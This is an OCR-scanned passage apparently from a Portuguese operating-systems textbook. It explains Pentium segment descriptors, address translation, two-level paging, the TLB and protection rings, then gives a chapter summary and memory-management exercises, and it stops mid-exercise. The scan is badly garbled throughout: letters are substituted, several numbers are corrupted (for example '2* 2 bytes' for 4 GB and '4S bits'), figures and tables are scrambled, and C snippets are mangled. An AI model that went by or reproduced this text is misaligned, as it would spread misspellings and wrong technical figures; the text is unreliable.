0: Segmento de 16 bits] 
i: Segmento de 32 bits j 

0: Limite em bytes 
1: Li miłe em p&ginas 


0: Segmento esta ausenle da memória 
1: Segmento esta presente na memória 

Nivel de privilegio (0-3) 

0: Sistema 
1: Aplicaęao 

Ti po de segmento e proteęao 


Base 24-31 C 

3 D 

0 

I 

Limite 

16-19 

P 

DPI 

S 

Ti po 

Base 16-23 

Base 0-15 

Limite 0-15 


32 Bits 


Endereęo 

re]ativo 


1 Figura 3.37 Descritor de segmento de código do Pentium, Os segmentos de dados sao ligeiramente diferentes. 
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e adidonado a esse registrador, re sułtan do em um ponteiro 
direto para o descritor do segmento pretendido. Por exem- 
plo, o seletor 12 refere-se a entrada 9 na GDT, a qual esta 
localizada no endereęo GDT + 72. 

Vamos iraęar os passos pelos quai$ um par (sektor, ik$- 
]ocamemo) e convertido para um endereęo fisico. Assim 
qne o microprograma e informado sobre qual registrador 
de segmento esta sendo u sad o, ele pode encontrar, eni seus 
registradores intern os, o descritor completo corresponden- 
te aquele seletor. Urna interrupęao ocorre se o segmento 
nao existe (sektor Oj ou se esta atualmente em disco. 

O hardware usa entao o campo li mi te para verificar 
se o deslocarnento esta a leni do finał do segmento, caso 
eni qtie lambem ocorre u ma interrupęao. Logica menie, 
deveria haver apenas um campo de 32 bits no descritor im 
formando o tamanho do segmento, mas existem somente 
20 bits dispomveis, de modo que entao se emprega óutro 
esąuema. Se o bit G (granularidade) e0 f o campo Limite 
indica o tamanho do segmento cxato, atć 1 MB. Se cle e 1, 
o bit G indica o tamanho do segmento cni paginas cm vcz 
dc bytes, O tamanho da pagina do Pentium c fixado cm 4 KB; 
portanto, 20 bits sao suficientcs para segment os de ate 2* 2 
bytes (4 GB). 

Pres u mi n do que o segmento encontra-se na memória 
e o deslocarnento esta dentro do alcance, o Pentium entao 
adiriona o campo Bau de 32 bits do descritor ao desloca- 
mento para formar o que e chamado de endereęo linear — 
como mostra a Figura 3.38. O campo Base e dividido cm 
tres partes e espalhado pelo descritor para compatibilidade 
com o 286, no qual o campo Base e de semenie 24 bits. 
Como consequenda, de permiie que cada segmento micie 
em um local arbitrario dentro do espaęo de endereęamemo 
linear de 32 bits. 

Se a paginaęao e desabilitada (por um bit no registra- 
dor de eontrole global), o endereęo linear e interpretado 
como o endereęo fisi co e enviado para a memória para len 
tura ou escrita. Assim, coina paginaęao desabilitada, temos 
uni esquema de segmemaęao ptira, em que cada endereęo 
de base do segmento e dado em seu descritor. E permitido 
aos segment os se sobreporem de modo acidental —prova- 
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veimente porque implicaria preocupaęao e tempo demais 
para verificar se eles estao disjuntos. 

Por outro lado, sc a paginaęao esta habilitada, o en¬ 
dereęo linear e interpretado como um endereęo virltml e 
mapeado sobre o endereęo fisico a partir do em pręgo de 
tabelas de paginas, da mesma maneira que nos exemplos 
anteriores. A unica complicaęao real e que, com um ende¬ 
reęo virtual de 32 bits e urna pagina de 4 KB, um segmento 
pode center ate um milhao de paginas, de modo que um 
mapeamento de dois mveis e usado para reduzir o tama¬ 
nho da labcla de paginas para segmentos pequcnos. 

Cada programa em execuęao tern um diretório de 
paginas, que consiste em 1.024 entradas de 32 bits. Ele 
esta localizada em um endereęo apontado por um registra- 
dor global. Cada entrada nesse diretório aponta para unia 
tabela de paginas que nimbem contem 1.024 entradas de 
32 bits. O esquema e most rado na Figura 3,39. 

K T a Figura 3.39(a), vemos um endereęo linear dwidido 
em tres campos: Dir, Pagina e Deslocarnento. O campo Dir e 
usado para indexar dentro do diretório de paginas a firn de 
localizar um ponteiro para a tabela de paginas correta. O 
campo Pagina e, entao, usado como um fndice dentro da 
tabela de paginas para encontrar o endereęo fisico da mol- 
dura de pagina. Por firn, o campo Deslocarnento e adidonado 
ao endereęo da moldura de pagina com o intuito de obter o 
endereęo fisico do bytc ou da palavra necessaria. 

Cada urna das entradas das tabelas de paginas e de 32 bits, 
20 dos quais contem um mi mero de moldura de pagina. 
Gs bits restantes carregam informaęoes de acesso e modifica- 
ęao, marca dos pelo hardware para atixiliar o sistema operario- 
nal, bits de proteęao e outros bits uteis. 

Cada tabela de paginas tern entradas para L024 mol- 
dli ras de pagina de 4 KB, de modo que urna unica tabela 
de paginas gerenria 4 megabytes de memória. Um segmen¬ 
to menor do que 4 M tera um diretório de paginas com 
unia unica entrada: um ponteiro para su a unica tabela de 
paginas. Dessa maneira, o cuslo para segmentos peque- 
nos e de somente duas paginas — em vez dos inilhoes de 
paginas que senatu necessarios em urna tabela de paginas 
de um niveL 



| Figura 3.38 Convers&o de um par {de seletores. deslocamentos) em um endereęo linear. 
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Bits 10 


Endereęo linear 
10 


12 


Dir 


Pagina 


Deslocamento 


Diretório de pagina 


(a) 

Tabela de paginas 


Moldura de pagina 


1024 

entradas 


□ir 


diretório aponta 
para a tabela de paginas 



(b) 


tabela de paginas 
aponta para palavra 


Figura 3.39 Mapeamento de urn endereęo lirear em um endereęo fisi co. 


Para cvilar rcferencias rcpctidas a memória, o Pen¬ 
tium, como o MULTICS, tern urna peąuena TLB, que ma- 
peia di rera menie a maioria das combinaęoes Dir-Pdgitia 
mais usadas reccntemente em endereęos ffsiccs da moldura 
dc pagina. Somcntc quando a combinaęao ani a I liao esta 
presente na TLB, o mccanistno da Figura 339 e de falo 
executado e a TLB e atualizada, Enąuamo as faltas na TLB 
sao taras, o desempenho e bom. 

Yale a pena notar que o moddo citado e vaiido para a 
aplicaęao quc na o precisa dc segmentaęao c quc ć satisfeita 
com um espaęo dc endereęa niemo unico pagina do de 32 
bits. Todos os registradores de segmento podem ser estabe- 
lec id os corn o mesmo sdetor, cujo descritor tem Base - 0 e 
Limite configurado no maximo. Entao, o deslocamento da 
instruęao sera o endereęo linear, com um unico espaęo 
de endereęamento usado — consequentemente, paginaęao 
normaL Dc falo, todos os sistemas operadonals aluais para 
o Pemium irabalham assim. O OS/2 foi o unico a usar o 
poder total da arquitetura MMU da Intel. 

Dc modo geral, e preciso fazer justięa aos projetistas do 
Pentium. Sabendo que as lecnicas de paginaęao. segmen- 
taęao e segmentaęao pagi nada possuem objetivos eon Ili- 
tames c que a nianutcnęao da coitipatibi lida cle com o 2Sć 
dificuha ainda mais a iinplemeniaęao, o projeto resultante 
e surpreendenternente simples e cl ar o, ainda mais se consi- 
derarmos que tudo isso e feito efirientemente* 

Embora tenhamos, ainda que de modo breve, visto a 
arąuitctura complela da memória virtual do Pentium, e 
imponante dizer algo sobre a proteęao, urna vezque se tra¬ 
ta de um assumo iminiamcme rdacionado com a memó¬ 
ria vinual Assim como o esąuema de memória, o sistema 


dc proteęao do Pentium tambeni e modela do de maneira 
parerida com o do MULTICS. O Pentium su porta ąuatro 
mveis de protcęao, dos quais o nfvel 0 e o mais privilegiado 
e o nfvel X o menos* Eks sao mostrados na Figura 3.40* 
Em cada insrantc, um programa em cxccuęao esta cm certo 
nfvel, indicado por um ca nipo cle 2 bits em sua PS W. Cada 
segmento no sistema tambem tem um nfvel 

Enąuanto urn programa se restringe a utilizar segmem 
tos cm śeu próprio irivd, tudo trabalha bem. As tentativas 
dc accsso aos dados cm um nfvcl mais alto sao permitidas, 
mas as lenta li vas de acesso aos dados em urn nivel mais 
baixo sao ilegais e causam intemjpęoes. As temativas de 
chamadas as rotinas cm um nfvcl difereme (maior ou me- 
nor) sao permitidas, mas de urna maneira cuidadosamente 
controlada. Para fazer urna cha ma da intemfvel, a instruęao 
GALL deve conter um sektorem vez dc um endereęo, Esse 
sclctor dcfinc um descritor chama do dc porta de cha- 
mada, quc fornece o endereęo da roli na a ser chama da. 
Assim nao e posstvel saliar para o meto de um segmento de 
código arbitrario em um nfvd difereme. Sonie me pornos 
oficiais de entradas podem ser usados. Os conceitos de lif- 
veis de proteęao e portas de chamadas forani pioneiramen¬ 
ie usados no MULTICS, no qual eram vistos como aneis 
dc protcęao. 

Um uso tfpico para esse mecanismo e sugerido na Fi¬ 
gura 3.40. No nivcl 0, encontramos o nticfeo do sistema 
operacionab o qual trata de E/S, gcrcnciamcnto dc me¬ 
mória e outros assuntos crhicos* No mVe! I, o manipula- 
dor de chamadas a o sistema esta presente. Os progratnas 
do usuario podem cha mar roli nas nesse mvel para que 
as chamadas dc sistema sejam realizadas, mas soniente 
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uma lista de rotinas espedfkas e protegidas pode ser 
cha mada. O mvel 2 comem rotinas de bibliotecas, pas- 
siVeis de serem compartilhadas entre muitos programas 
em execuęao. Os programas do usuario podcm chamar 
essas rotinas e ler sens dados, mas estes nao podcm ser 
modtficados* Por firn, os programas do usuario executam 
em mvel 3, que apresenta a menor proteęao, 

Intemipęoes de software c dc hardware empregam 
um mecamsmo similar aquele das portas de chamadas. 
Elas tambem referendam descritores, em vez de ende- 
reęos absolutos, e os descritores apontam para rotinas 
espedficas a serem execuiadas. O ca nipo Ti po na Figura 
3.37 diferencia segmemos de códigos, segmentos dc da¬ 
dos e os varios lipos de portas. 

M:l Pesquisas em gerenciamento 
de memória 

O gerenciamento de memória — espedalmenie os 
algoritmos de paginaęao — ontrora łoi uma area fertil de 
pesquisa, mas hoje em dia e escassa, pclo menos quanto 
a si.stem.as dc propósito gerab A maioria dos sistemas reais 
tende a usar alguma variaęao do algoritmo do relógio, 
em razao da fadlidade de implenientaęao e eretividadc 
relativa. No entanto, uma exceęao recente c o reprojeto 
do sistema dc memória virtual BSD 4.4 (Cranor c Pa- 
rui kar, 1999). 

De qualquer modo, ainda exislcm pesąuisas em anda- 
mento rdacionadas a paginaęao em novos lipos de siste- 
mas. Por exemplo, telefones celulares e PD As se transfor- 
maram em peąuenos PCs, e muitos deles paginam a RAM 
para o 'disco', com a diferenęa de que um disco em um 
tclefone cel u lar e a memória flasli, que tern propriedades 
diferentes das do disco magnetico rotativo. Parte do traba- 


l.lio recente e relatada por (In et ab, 2007; Joo et al. P 2006; 
Park et al, 2G04a). Park et al. (2004b) tambem examma- 
ram paginaęao por demanda consciente de energia em dis- 
positivos móveis. 

Alem do mais, ha pesąuisas sobre a model a ęao do de- 
sempenho da paginaęao (Alberset al., 2002; Burum e Kelly, 
2003; Cascaval et ab, 2005; Panagiotou e Sou za, 2006; Pe- 
serico, 2003). Interessa tambem o gerenciamento de memó¬ 
ria para sistemas multumdia (Dasigenis et al, 2001; Hand, 
1999) e sistemas de tempo real (Pizlo e Vitek, 2006). 


3.9 


Neste capftulo examinamos o gerenciamento dc me* 
mória. Vimos que os sistemas mais simpies nao realizam 
qualqucr tipo de troca dc proccssos entre a memória c o 
disco ou paginaęao. Urna vez quc um programa e carrc- 
gado para a memória, de periiianece nda ate sua finaliza- 
ęao. Alguns sistemas operacionais permitem sonie me um 
processo por vez na memória, enquamo outros suportam 
multiprogramaęao. 

O próximo passo e a troca dc proccssos entre a menió- 
ria c o disco. Quando cla ć usada, o sistema pode tralar pro- 
cessos em maior numero do quc a quamidade de memória 
de que dispoe e pennitiria. Os proccssos para os quais nao 
exisie memória disponfveI sao levados para o disco* O es- 
paęo livre na memória ou no disco e controłado com o uso 
de mapa de hits ou lista de lacunas. 

Os computadores modernos muitas vczcs apresentam 
alguma forma de memória virtual. Em sua configuraęao 
mais simplcs, o espaęo de cndereęamento dc cada processo 
e dividido em blócos de tamanho uniforme diamados de 
paginas, que podcm ser colocadas em qualquer moldura 
de pa giną disponfvel na memória. Existem muitos algo¬ 
ritmos de substituięao de pagina; dois dos melhores sao o 
algoritmo do envelhecimento (a0W0) e o WSClocL 

Para fazer com quc os sistemas de paginaęao trabalhem 
bem, a cscolha do algoritmo nao c suficiente; c nccessario 
tambem observar questóes como a determinaęao do con- 
j un to de i raba 111 o, a polftica de alocaęao de memória e o 
tamanho da pagina. 

A segmentaęao aj uda no tratamento de estruturas dc 
dados que alteram seus tamanhos durame a exccuęao e 
simplifica a ligaęao c o compartilliameiito. Ela facilita, atu- 
da, o proviniemo dc proteęao diferendada para segmentos 
diferentes, Muitas vezes a segmentaęao e a paginaęao sao 
combi nadas para fornecer uma memória virtual bid i men- 
sional. O sistema MULTICS e o Pentium da Intel suportam 
segmentaęao e paginaęao. 

Problemas 

1. Na Figura 3.3, o regist rad o r-base c o registradordimUe 
contem o iiiesmo valor, 16 JS4. isso e apenas um adden- 
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te ou eles sao sempre iguais? Se for apenas Lim addeme, 
por que eles sao iguais nesse exemplo? 

2. Um sistema de iroca dc processos elimina lacunas na me- 
mona v!a compactaęao. Ao supor u ma distribuięao alca- 
tória de muitas lacunas e diversos segmentos de dados e 
um tempo de leitura/escrita de 10 ns para uma palavra de 
memória de 32 bits, quanto tempo de levara para com- 
pactar 128 MB? Para simplificar, presuma que a palavra 0 
c parte de uma lacuna c que a palavra da parte mais alta 
da memória comenha dados validos. 

3. Ptete p robienia, voce deve comparar o arrnazenamento 
nccessario para manier o controie da memória disponivei 
u san do um mapa de bits vem« uma lista encadeada. A me¬ 
mória de I2S MB e alocada em unidades de n bytes. Para 
a lista encadeada, presuma que a memória seja constitufda 
de uma sequenda aliernada de segmentos e lacunas, cada 
um de 64 KB. Alem disso, suponha que cada nó da lista en¬ 
cadeada precise de um endereęamento de memória de 32 
bits — ló bits para o comprimento e 16 bits para o campo 
Prómio nó. Quamos bytes de arrnazenamento sao ncccssa- 
rios para cada metodo? Qual e o melhor? 

4. Considere um sistema de iroca de processos entre a memó¬ 
ria e o disco no qua! a memória e constitwda dos seguintes 
tamanhosdc lacunas cm ord cm na memória: 10 KR H 4 KB, 
20 KB, 18 KB, 7 KB, 9 KB, 12 KB e 15 KB. Qual lacuna e 
tornada pelas soiidtaęoes sucessivas do segmemo dc: 

(a) 12 KB, 

(b) 10 KB. 

(e) 9 KB. 

para o first ful Repita agora a quesiao para o kstftt, o 
worstfit e o netffit 

5* Para cada um dos seguintes endereęos virtuais decirnais, 
cakuleo nurneroda pagina vinual eo deslocamento para 
unia pagina de 4 KB c para uma pagina dc S KB: 20000, 
32768, 60000. 

6. O processador Intel 8086 nao su porta memória virmal 
Apesar disso, antigamentc, algumas empresas venderam 
sistemas que continbam unia CPU 8086 origina) c faziam 
paginaęao, Suponha como eles fazlani isso. Dica: pense no 
bcalizaęao lógica da MMI). 

7. Considere o próg rama em C seguinte: 
im X[N]: 

im step = M; // M e algmna co ns ta me predefmida 
for (int i=0; i < Ń; i += step) X[i] 4- 1; 

(a) Se csśe programa for exccmado em uma maquina 
com um Lama nho dc pagina dc 4 KB e uma TLB de 
e ntra da de 64 bits, quc valores de MeN causa ra o 
unia auscncia de pagina na TLB para cada exccuęao 
do laęo interno? 

(b) Su a resposta na parte (a) seria difereme se o laęo fosse 
repetido muitas vezes? Bxplique. 

8. A quantidade de espaęo em disco que precisa estar dispo- 
nfvel para arrnazenamento de pagina e relacionada com o 
mi mero maximo de processos {n), o mimem de bytes no 


espaęo de endereęamento viuual (v) e o numeru de bytes 
de RAM (r). Ela borę uma expressao matematica para os 
requisitos de espaęo de disco, considerando a piór das hi- 
póteses. Ale ąuc ponto cssa ąuantidade c realista? 

9, Uma maąuina tern um espaęo de endereęamento de 32 
bits e uma pagina de 8 KB, A tabela de paginas esta to 
lalmente em hardware, com uma pakma de 32 bits para 
cada e ntra da. Quando um processo tem i meto, a tabela de 
paginas e copiada para o hardware a partir da memória, 
no ritmo de uma palawa a cada 100 ns, Se cada processo 
execma durante 100 ms (indirindo o tempo para carregar 
a tabela de paginas), qual a Iraęao do tempo de CPU que 
e dedicada ao carregamento das labelas de paginas? 

10. Suponha quc uma maąuina tenha endereęos virtuais de 
4S bits c endereęos fisi cos de 32 bits. 

(a) Se as paginas sao dc 4 KB, quanlas entradas estao na 
tabela de paginas se da tiver apenas um unico nivel? 
Explique. 

(b) Suponha quc esse mesmo sistema tenha uma TLB 
(tramlatbti bokasidc buffer —tabela dc traduęao dc en- 
dercęos) com 32 entradas, Alem disso, suponha quc 
um programa contcnha mstruęóes quc se encaixem 
em uma pagina e lei a m seąuenciabnente dementos de 
numeros intciros longos de um arranjo de milhares dc 
paginas. O quanto a TLB sera eficienie para esse caso? 

11. Suponha ąue uma maąuina tenha endereęos v[miais de 
38 bits e endereęos fisfcos de 32 bits. 

(a) Qudl ć a prindpal yantagem de uma tabela de paginas 
em mukiplos niveis cm relnęaoa uma de nfvel unico? 

(b) Com uma tabela de paginas de dois nfvcis # paginas dc 
16 KB e entradas dc 4 bytes, quantos bits devcriam 
ser alocados para o campo da tabela no topo da pa¬ 
gina e quamos para o campo da tabela de paginas do 
pnkiino nivel? Expltque. 

12. Um computador com um endereęamento dc 32 bits usa 
unia tabela de paginas de dois mveis. Os endereęos sao 
quebrados em utn campo de 9 bits para a tabela de paginas 
de nivel 1, um campo de 11 bits para a tabela de paginas de 
mvd 2 e um deslocamcnto. Qual o tamauho das paginas e 
quamas cKistcm no cspaęo de endereęamento citado? 

13. Suponha quc um endercęo virtual de 32 bits seja quc- 
brado em ąuatro campos: a, b t c c Ł Os tres primeiros 
sao u sad os para um sistema dc tabela de paginas de tres 
nivcis, O quarto campo, d t e o desloeamento. O ntlme¬ 
ro de paginas de pen dc dos tamanhos de todos os quatro 
campos? Se nao, quais campos infiueuciam nessa questao 
e quais nao? 

14. Um determinado computador tern endereęos vinuais de 
32 bits e paginas dc 4 KB. O programa e os dados, juntos, 
cabem na pagina dc mais baixa ordcm (0—4095). A pilha 
cabe na pagina de mais aha ordem. Quantas entradas sao 
necessarias na tabela de paginas se a paginaęao tradiciu- 
nal (dc um mvd) e usada? E quantas entradas na tabela 
de paginas sao necessarias para uma paginaęao de dois 
nfveis, com 10 bits para cada parte? 
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15. Urn computador cujos processos tem LQ24 paginas cm 
seus espaęos de endereęamemo manieni suas tabelas na 
memória. A sobrecarga necessaria para a leimra de inna 
palavra da tabela de paginas ć de 5 ns. Para reduzir essc 
cysto, o contputador Lem urna TLE, que eon tern 32 par es 
(pcigina virtuaL moldura dc pagina) c assim pode fazer 
unia vatxcdura nas cmradas cm I ns. Qual ć a taxa dc 
acerto necessaria para reduzir a sobrecarga media para 2 ns? 

16. A TLR no VAX nao contem o bit R. Por que? 

17. Como pode urna mcmćria associalwa, necessaria para 
urna TLB, ser implementada cm hardware, e quais sao as 
iniplicaęoes quamo ci capacidade de expansao para esse 
projeto? 

18. Uma maquina tein urn endereęamenio cimtal de 4S bits e 
um endereęamento ffslco de 32 bits. As paginas sao de 8 KB. 
Quantas cmradas sao necessśrias para a tabela de paginas? 

19. Um computador com uma pagina dc 8 KB, uma memória 
de 256 KB c um espaęo de endereęamemo de 64 GB usa 
uma tabela de paginas iiwertidas para implementar sua 
niemória virtual. Qtial tamanho devctera tabela dc espa- 
Ihamento para garantir um tamanho medio da cadeia de 
espalhamcnto menor quc I? Pres u ma quc o tamanho da 
tabela de espalhamento e uma pmenda de dois. 

20 . Um estudanie da disdplina projeto de tompiladores propdc 
a o professor um projeto de um compilador que produzira 
uma lisia de referenci as dc paginas, a qual pod era ser usada 
para Implementar o algoritmo de substituięao ótimo. Isso e 
posśKcl? Por quc? Existe algo que poderia ser fcito para mc- 
thorar a eficiencia da paginaęao ern lempo de execuęao? 

21. Suponha que o lkixo dc referenda dc pagina yiriual con- 
icnha repetięoes de seąucnctas longas de referenci as dc 
paginas seguidas ocasionalmcntc por uma referenda 

dc pagina aleatória. Por excmpio r a sequenda: O, 1. 

511,431 r O, 1, 511, 332, 0, U consiste em repetięoes 

da sequencia O, 1. 511 seguidas por unia referenda 

aleatória as paginas 431 e 332, 

(a) Por que os algoritmos de subsutuięao de pagina 
(LRU, FIFO, relógio) nao sera o efkazes no trata men- 
lo da carga dc trabalho para uma alocaęao dc pagina 
quc seja menor quc o cotnprimento da seąuenda? 

fl>) Se nesse program a loram alocadas 500 molduras de 
paginas, descreva um metodo de substimięao de pagi¬ 
na que tenha um desempenho melhor que os algo- 
riimos LRU, FIFO ou relógio. 

22. Se o algoritmo dc substiiuięao FIFO ć u sad o com qua- 
tro molduras de pagina c oito paginas virtuais, quamas 
faltas de pagina ocorrerao com a cadeia de referenci as 
0172327103 se os quatro q u ad fos estao inicialmente va- 
zios? Agora rcpila esic problem a para LRU. 

23. Observe a sequencia de paginas da Figura 3.14(h). Su¬ 
ponha quc os bits R, para as paginas de B a A , sejam 
11011011, respectivamentc. Quais paginas scrao rcmovi- 
das pelo algoritmo segunda chance? 

24. Um computador pequeno tem ąuatro molduras de pagi¬ 
na. No primeiro tique dc relógio, os bits R sao 0111 (pa- 
gina 0 e 0, as demais sao 1). Nos tiques subsequemes os 
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yałores sao 1011, 1010, 1101,0010, L010, 1100 e 0001. 
Sc o algoritmo do cnvclheciniemo (a$in§) ć tisado com 
um contador de 8 bits, quais os valores dos quatro coma- 
dores após o ultimo iique? 

25. De um exemplo simples de uma sequencia de referenda 
dc paginas ondc a primcira pagina seledonada para subs¬ 
timięao seja diferente para os algoritmos de substiiuięao 
de pagina relógio e LRU. Suponha que em um processo 
sejam alocadas tres molduras e que a cadeia de referenda 
contenha numeros de pagina do conjunto 0, I, 2, 3. 

26. No algoritmo WSClock da Figura 3,20(c), o ponteiro do 
relógio a po n ta para a pagina com R = 0. Se t = 400, essa 
pagina sera removtda? O que acontecera se t = 1000? 

27. Quanto tempo leva para carregar um programa de 64 ICB 
dc um disco cujó tempo dc posi dona men tu medio seja dc 
10 rns, o tempo de rotaęao seja de 10 ms e cujas trilhas 
contenhain 32 KB, considerando: 

(a) tamanho de pagina de 2 KR? 

(b) tamanho dc pagina de 4 KB? 

As paginas sao cspalhadas alcaioriamenie ao redor do disco, 
e o numero dc dlindros e tao grandę quc a probabilidadc 
dc duas paginas esta rem no uicsmo eilindro ć dcsprezivel. 

28. Um computador leni quatro molduras de pagina. O tem¬ 
po de carregamento de pagina na memória, o i ustanie do 
ultimo acesso e os bits R e M para cada pagina sao mostra- 
dos a seguir (os tem po 5 es tao em lique$ de relógio): 


Pagina 

Ga rr ega do 

Ultima ref. 

R 

M 

0 

126 

280 

1 

0 

1 

230 

265 

0 

1 

2 

140 

270 

0 

0 

3 

110 

285 

1 

1 


(a) Qual pagina sera trocada pelo NRU? 

(b) Qual pagina sera trocada pelo FIFO? 
w Qual pagina sera trocada pelo LRU? 

(d) Qual pagina sera imcada pelo segunda chance? 

29. Considere o seguinte arranjo bidi men słona I: 

int X[64j[64j; 

Suponha que um sistema tenha quatro molduras de pagi¬ 
na e que cada moldura seja de 128 paLwras (um numero 
inteiroocupa uma palavra). Os programas que manipuJam 
o arranjo X sc ajustam exatamcntc a uma pagina esempre 
ocupam a pagina 0. Os dados sao trocados para dentro e 
para fora das outras tres molduras, O arranjo X e armazc- 
n a do segundo a ordem da Ilia ma lor (i sto e, X[0]| 1) segue 
TffO] [0} na memória). Qual dos dois fragmentos de código 
mostrados a seguir gerara o menor numero dc faltas de pa¬ 
gina? Expliqucc ca kule o numero total de faitasdc pagina. 

Fragmento A 

fo.r (im j — 0; j < 64; j++) 

for (int i - O; i < 64; i++) X[lj [j] = 0; 
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Fmemento B 

for (int i = 0; i < 64; i++) 

for (im j = 0; j < 64; j++) X[i|[j] - 0; 

30. U 3 na das primeiras maqumas de compartilbamento de 
tempo, oPDP-L tinha lima memória dc 4 K palavras dc 
18 biis. Ele mantmha um processo por vez na memória. 
Qimndo o escalotiador decidia exeaitar outro processo, o 
processo da memória era escritocm um disco (tambor) dc 
paginas, com 4 K palavras de 18 bits, ao redor da drcmi- 
ferencfa do disco, O disco poderia comeęar a escrever (on 
ter) em qualquer palavra, cm vez de somente na palavra 
0, Por ąut voce acha que esse disco łoi escolhido? 

31. Om coinpulador prove, a cada processo, 65,536 bytes de 
espaęo de endereęainento dividido em paginas de 4.096 
bytes. Um determinado programa tem um lamanho de 
texto de 32,768 bytes, um lamanho de dados de 16386 
bytes e um tamanho de pil ha de 15.870 bytes, Esse pro- 
grama se encaixa no referldo espaęo de endereęamento? 
Se o tamanho da pagina fosse de 521 bytes, eie se encai- 
xaria? (Lembre-se dc que inna pagina nao pode oonter 
partcs dc dois segmentos difcrcntcs.) 

32. Unia pagina pode estar em dois conjtintos de trabalho 
(working sets) ao mesmo tempo? Expliquc. 

33. Tem -se observado que o nu mero de instruęocs cxccu- 
Eadas cntre faltas dc pagina e diretamente propordonal 
ao nu mero de mókł u ras de pagina aiocadas para um 
programa. Se a memória disponiyd for dnplicada, o 
intervalo medio entre faltas de pagina sera duplicado. 
Suponha que urna msmięao normaI leve um microsse- 
gundo, mas, se uma falta de pagina ocorrer, eta levara 
2.001 microssegundos (isto e, 2 ms para tratar a falta). 
Se um programa leva 60 s para executar — periodo em 
que dc tera 15 mil faitas dc pagina —, quanto tempo 
dc levaria para cxccmar sc existisscm duas vezcs mais 
memória dispomvel? 

34. Um grupo de projetistas de sistemas operacionais da ein- 
presa Frugal Computer esla tenlando enconirar meios de 
reduzir a quantidade de area de iroca necessaria em sens 
sistemas operacionais, O lider do grupo sugeriu nao per- 
der tempo, de modo alguim com o salvaniemo do texto 
do programa na area de troca, mas, simplesmente, pagt- 
na-lo diretamente do arquivo binario quando necessario. 
Se e que isso c possfvel sob quais condiędes cssa ideia 
fimciona para o cod i go do programa? E sob quais condi- 
ędes da futickma para os dados? 

35. Uma instruęao de linguagem de maąuina para carregar 
uma patavra dc 32 bits para demro de um registrador 
conieni o endcrcęo dc 32 bUs da própria palavra a ser 
carregada, Qtial e o numero maximo dc faltas de pagina 
que cssa instmęao pode causar? 

36. Quando a segmemaęao e a paginaęlo sao usadas em ton- 
junto, como no MULTICS, primeiroo descritor de segmen¬ 
tos deve ser procurado e, entan, o descritor da pagina. 


A TLB lambem trabalha dessa maneira, com dois mveis 
de procura? 

37. Considcrcmos tim programa que tenha os dois segmentos 
most rad os a seguir, conststindo de mstmęoes no segmen- 
to 0 e dc dados de leitura/eseńta no segmento L O seg- 
mento 0 tem proteęao Leitura/execuęao e o segmento 1 
tem proteęao leitnra/esenta. O sistema dc memória c um 
sistema dc memória virtu aI paginado por dcmanda com 
endcreęos virtuais que tem um numero dc pagina de 4 
biise urn deslocamemo de 10 bits. As tabelas de paginas e 
proteęao sao as seguimes (todos os numeros na tabela sao 
dęci ma is): 


Segmento 0 

Segmento 1 

Lęitu ra/execu ęa o 

Leitura/esorita 

Pagina 
yirtual # 

Moldura da 
pagina # 

Pagina 
yirtual # 

Moldura da 
pagina # 

0 

2 

0 

Em disco 

1 

Em disco 

1 

14 

2 

11 

2 

9 

3 

5 

3 

6 

4 

Em disco 

4 

Em disco 

5 

Em disco 

5 

13 

6 

4 

6 

8 

7 

3 

7 

12 


Para cada um dos seguintes casos, clas dao o endereęo de 
memória real (efeliva) que resulta da traduęao de endere- 
ęo dinamica ou idenlificam o tipode erro quc ocorrc (seja 
erro de pagina ou de proteęao). 

(a) Buscar do segmento 1, pagina I, deslocairiemo 3. 

(b) Anna zen ar no segmento 0, pagina 0, deslocamento 16, 
w Buscar do segmento 1, pagina 4, deslocamento 28. 
w Saltar para localizaęao no segmento 1, pagina 3 # des- 

locamento 32. 

38, Voce eonsegue imaginar alguma slluaęao cm quc dar su- 
portc a memória viitual seria uma ma ideia c o que sc 
ganha quando nao e necessario o suporte de memória 
virtual? Expliqiie. 

39. Dcscnhe um histograma c cakule a media c a mediana 
dos lamanhos de arquivos binarios exeauaveis em um 
compuiadora que voce tem acesso. Em um sistema Win¬ 
dows, olhe todos os arquivos ,exe e .dli; em um sistema 
UN1X, verilique todos os arquivos execuiaveis no fbin t 
lusribin e flocaUbiną ue nao sejam Scripts (ou use o utiliia- 
rio file para enconirar todos os excaitavęis). Dcterminc o 
tamanho ótimo da pagina para esse computador> Wando 
cm conta a pena s o códlgo (nenhum da do). Consldere a 
fragmentaęlo interna e o tamanho da tabela de paginas, 
fazendo uma suposięao razoavel sobre o tamanho da en- 
trada na tabela de paginas. Presuma quc todos os progra- 
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mas podem ser execuLados com igual prohabilidatie e que, 
portamo, e possfvel atribuir-Ilies o mesmo peso. 

40. Programas pcquenos para MS-DOS podem ser compi- 
lados como arquivos >CQM. Hsses arquLvos sao sempre 
ęarregados no endereęo 0x100 em um segmcrito u ni co 
de memória qne e usado para código, dados e pil ha. As 
instruęoes quc transferem o eon troi e da exeaięao, como 
JMP e GALL, ou que acessam dados estaticos, de ende- 
rcęos fixos, tem o endereęo compilado no código-objęto. 
Escreva um program a capaz de realocar esse arquivo de 
programa para execmar em um endereęo arbitrario. Sen 
programa dcve varrcr o código e proco rar eódigos-objęto 
de instruęoes que referenci ani endercęos Jlxos dc memó¬ 
ria c entao modificar os endereęos que apontam para as 
posięócs de memória dentro da faixa a ser rcalocada. Vocc 
pode encontrar os códigos objęto em um texto de lingua 
gem de programa ęao assembly. Notę que fazer isso com 
perfeięao, sem utilizar informaęao adtcional, em geral e 
unpossfvel, pois algumas palavras dc dados podem ter va- 
lorcs que imitem códigos-objęto de instruęoes. 

41. Escreva um programa que simule um sistema de pagina- 
ęao usandoo algoritmo de eiwelhecimento. O ml mero de 
molduras de pa gin a e um pa ram et ro. A sequencla de re- 
ferencias de paginas dcve ser lida de um arquivo. Para um 
dadoarquivo de emrada, represeme o nuniero de faltas dc 
pagina por 1.000 rcferencias de memória como funęao 
do n u mero de mnlduras de pagina disponfreis. 

42. Escreva um programa que demonsire o efeito de a u sen- 
cias de pagina na TLB sobre o tempo de acesso a memória 
efetivo medirtdo o tempo por acesso necessarlo para per- 
corrcr um arranjo grandę, 

(a) Expliqi.se os principais conceitos por tras do programa 
c descrcva o quc voce espera que a saida niostre a 
alg unia arquitetura dc memória virtual prątka. 
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(b) Exccute o programa cm algum computador e cxpliquc 
o quanio os dados se ajustam a suas expectativas. 

(c) Repita a parte (b), mas para um computador mais 
anligo, com urna arquiletiira diferemę, c explique as 
prindpais diferenęas na saida. 

43. Esereva um programa que demonstre a diferenęa enrre 
o uso de urna polftica de substituięao de pagina local e 
u ma giobal para o caso simplcs dc dois proccssos, Voce 
